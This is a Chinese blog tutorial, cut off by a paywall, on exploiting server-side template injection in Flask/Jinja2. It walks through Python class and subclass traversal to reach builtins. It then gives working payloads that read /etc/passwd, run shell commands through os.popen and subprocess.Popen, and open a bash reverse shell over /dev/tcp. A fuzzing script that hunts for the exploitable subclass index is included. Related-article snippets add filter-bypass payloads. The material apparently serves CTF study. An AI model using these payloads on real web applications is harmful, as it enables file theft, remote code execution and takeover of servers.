SSTI漏洞学习(下)——Flask/Jinja模板引擎的相关绕过

最新推荐文章于 2024-10-27 22:19:18 发布
原创 最新推荐文章于 2024-10-27 22:19:18 发布 · 1.2k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞 #编程语言 #安全漏洞 #web

本文详细介绍了如何在Python中寻找SSTI攻击载荷,包括通过魔术方法获取基本类、重载__init__方法、利用Flask/Jinja模块绕过限制,以及各种技巧和绕过手段,如字符串表示法、字典操作、对象元素获取和请求注入。

0x01 再看寻找Python SSTI攻击载荷的过程

获取基本类

对于返回的是定义的Class内的话:
__dict__   //返回类中的函数和属性,父类子类互不影响
__base__ //返回类的父类 python3
__mro__ //返回类继承的元组,(寻找父类) python3
__init__ //返回类的初始化方法   
__subclasses__()  //返回类中仍然可用的引用  python3
__globals__  //对包含函数全局变量的字典的引用 python3
对于返回的是类实例的话:
__class__ //返回实例的对象,可以使类实例指向Class,使用上面的魔术方法

''.__class__.__mro__[2]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]

此外,在引入了Flask/Jinja的相关模块后还可以通过

config
request
url_for
get_flashed_messages
self
redirect

等获取基本类,

获取基本类后,继续向下获取基本类(object)的子类

object.__subclasses__()

找到重载过的__init__

在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的

也可以利用.index()去找file,warnings.catch_warnings

>>> ''.__class__.__mro__[2].__subclasses__()[99].__init__
<slot wrapper '__init__' of 'object' objects>
>>> ''.__class__.__mro__[2].__subclasses__()[59].__init__
<unbound method WarningMessage.__init__>

查看其引用__builtins__

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']

这里会返回dict类型,寻找keys中可用函数,直接调用即可,使用keys中的file等函数来实现读取文件的功能

''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()

常用的目标函数有这么几个

file
subprocess.Popen
os.popen
exec
eval

常用的中间对象有这么几个

catch_warnings.__init__.func_globals.linecache.os.popen('bash -i >& /dev/tcp/127.0.0.1/233 0>&1')
lipsum.__globals__.__builtins__.open("/flag").read()
linecache.os.system('ls')

更多的可利用类可以通过遍历筛选的方式找到

比如对subprocess.Popen我们可以构造如下fuzz脚本

import requests

url = ""

index = 0
for i in range(100, 1000):
    #print i
    payload = "{
  
  {''.__class__.__mro__[2].__subclasses__()[%d]}}" % (i)
    params = {
        "search": payload
    }
    #print(params)
    req = requests.get(url,params=params)
    #print(req.text)
    if "subprocess.Popen" in req.text:
        index = i
        break


print("index of subprocess.Popen:" + str(index))
print("payload:{
  
  {''.__class__.__mro__[2].__subclasses__()[%d]('ls',shell=True,stdout=-1).communicate()[0].strip()}}" % i)

那么我们也可以利用{

最低0.47元/天 解锁文章
Flask模板注入编码姿势绕过-CMCTF
as you know, nlp is fantasitc!
04-25 1192
写在前面:通过这次比赛学到flask模板注入几个比较sao的绕过姿势 参考文章如下 ctf中flaskssti xctf高校网络安全挑战赛-华为云专场的MINE2 1、参考MINE2这道题目的一些过滤方法,以及一些替代方法 2、主要是利用attr获得属性,一些其他的编码方式如十六进制编码绕过,unicode编码绕过,格式化字符串绕过以及上面图片中提到的十六进制转字符串绕过 格式化字符串绕过payload ?msg={% print(session|attr("__init__"))|attr("__
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 2万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
SSTI注入WAF绕过
zkaq7777777的博客
06-03 1458
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 9264
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤,下划线过滤,单双引号过滤,很齐全
SSTI模块注入SSTI+Flask+Python(下):绕过过滤
07-25 3466
SSTI绕过过滤
SSTI漏洞学习(下)——Flask_Jinja模板引擎相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎相关绕过SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
SSTI模板注入基础(Flask+Jinja2)
qq_55202378的博客
12-22 2432
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类中的一个内置属性,值是该实例的对应的类。
Flask服务端模板(Jinja2)注入漏洞(SSTI)复现
又菜又爱倒腾的博客
10-29 1737
#Flask服务端模板(Jinja2)注入漏洞(SSTI)复现# 一、漏洞简介 服务器模板注入(SSTI)是一种利用公共 Web框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI攻击可以利用拼接恶意用户输入导致各种漏洞。通过模板Web应用可以把输入转换成特定的HTML文件或者email格式。 二、漏洞影响 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。 三、产生原因 from
FlaskJinja2)服务端模板注入漏洞SSTI)整理
qq_46145027的博客
04-19 2302
整理一下Flask框架下的SSTI漏洞相关知识
关于SSTI模块注入的常见绕过方法
Welcome To Myon'Blog !
07-05 2643
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
SSTI注入绕过-Jinjia2模板
fatmoForE
11-29 760
题目选自NCTF2020的Master 源码如下: from jinja2 import Template from flask import Flask,request app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') blacklist = ['%', '-', ':', '+', 'class', 'base', 'mro', '_', 'con
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过(ctfshow web入门370)
你们de4月天的博客
03-30 2102
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
SSTI模板注入-常用的一些绕过
九尾ww的博客
10-27 680
漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式 1.过滤[]等括号 使用gititem绕过。如原poc {{"".class.bases[0]}} 绕过后{{"".class.bases.getitem(0)}}
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 5579
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
jinja2模板注入_Flask/Jinja2模板注入中的一些绕过姿势
weixin_36329818的博客
01-17 438
转自 https://p0sec.net/index.php/archives/120/好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。0x00 获取基本类首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2...
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 1167
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
六、SSTI模板注入绕过
黑日里不灭的light
10-20 532
解释:SSTI(Server-Side Template Injection)是一种在服务器端模板注入恶意代码的攻击技术。它利用了模板引擎漏洞,使攻击者能够将恶意代码插入到模板中,在服务器端执行这些代码,例如python的flask就存在容易出现这个问题。危害:代码执行:攻击者可以通过SSTI注入在服务器端执行任意代码,包括命令执行、远程文件包含等攻击。这可能导致服务器被完全控制,进一步导致数据泄漏、服务器崩溃或恶意操作。
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 2250
SSTI总结:流程和绕过
网络安全最新SSTI模板注入详细总结及WAF绕过_fenjing ssti(2),腾讯3轮面试都问了网络安全事件分发
2401_84545016的博客
05-10 491
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
jinja2模板ssti漏洞
最新发布
01-18
然而,在某些情况下,如果应用程序未能正确处理用户输入并将其传递给模板引擎,则可能导致服务器端模板注入 (SSTI) 漏洞。 当存在 SSTI 漏洞时,攻击者可以向 Web 应用程序发送恶意构造的数据作为参数或 URL 查询...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AI小模型

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值